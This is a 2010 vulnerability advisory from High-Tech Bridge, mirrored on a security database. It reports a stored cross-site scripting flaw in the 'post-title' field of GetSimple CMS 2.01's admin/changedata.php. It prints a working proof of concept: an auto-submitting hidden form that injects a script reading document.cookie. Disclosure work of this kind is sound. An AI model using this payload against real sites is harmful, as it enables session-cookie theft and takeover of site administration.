XSS vulnerability in GetSimple CMS

2010-09-29T00:00:00
ID SECURITYVULNS:DOC:24811
Type securityvulns
Reporter Securityvulns
Modified 2010-09-29T00:00:00

Description

Vulnerability ID: HTB22609 Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_getsimple_cms_1.html Product: GetSimple CMS Vendor: Cagintranet Networks ( http://get-simple.info/ ) Vulnerable Version: 2.01 and Probably Prior Versions Vendor Notification: 15 September 2010 Vulnerability Type: Stored XSS (Cross Site Scripting) Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details: User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "admin/changedata.php" script to properly sanitize user-supplied input in "post-title" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/admin/changedata.php" method="post" name="main" >

<input type="hidden" name="post-title" value='page title"><script>alert(document.cookie)</script>' /> <input type="hidden" name="post-id" value="test" /> <input type="hidden" name="post-metak" value="" /> <input type="hidden" name="post-metad" value="" /> <input type="hidden" name="post-parent" value="" /> <input type="hidden" name="post-template" value="template.php" /> <input type="hidden" name="post-menu" value="test" /> <input type="hidden" name="post-menu-order" value="" /> <input type="hidden" name="post-content" value="page html" /> <input type="hidden" name="existing-url" value="test" /> <input type="hidden" name="submitted" value="Save Updates" />

</form> <script> document.main.submit(); </script>